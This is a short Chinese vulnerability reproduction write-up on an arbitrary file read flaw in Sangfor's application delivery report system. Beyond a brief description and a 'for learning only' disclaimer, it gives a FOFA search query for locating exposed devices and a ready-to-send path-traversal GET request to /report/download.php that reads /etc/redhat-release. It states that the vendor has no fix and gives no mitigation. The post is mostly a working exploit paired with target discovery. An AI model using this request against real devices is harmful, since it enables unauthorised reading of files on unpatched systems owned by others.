深信服应用交付报表系统任意文件读取漏洞复现

深信服应用交付报表系统任意文件读取漏洞复现

0x01 前言

本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！

0x02 漏洞描述

SINFOR AD是深信服最新推出的应用交付系列设备，其突出特色就是SINFOR AD的智能分析功能。深信服应用交付报表系统存在任意文件读取漏洞,攻击者利用漏洞可读取设备中的指定路径文件。

0x03 影响范围

深信服应用交付报表系统 

0x04 漏洞环境

fofa：app=“SANGFOR-应用交付报表系统”

0x05 漏洞复现

1.访问漏洞环境

2.构造POC

POC （GET）

GET /report/download.php?pdf=../../../../../etc/redhat-release  HTTP/1.1
Host: ip:port
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

3.复现

响应成功，文件成功读取到！！！

0x06 修复建议

厂商尚未提供修复方案，请关注厂商主页更新： https://www.sangfor.com.cn/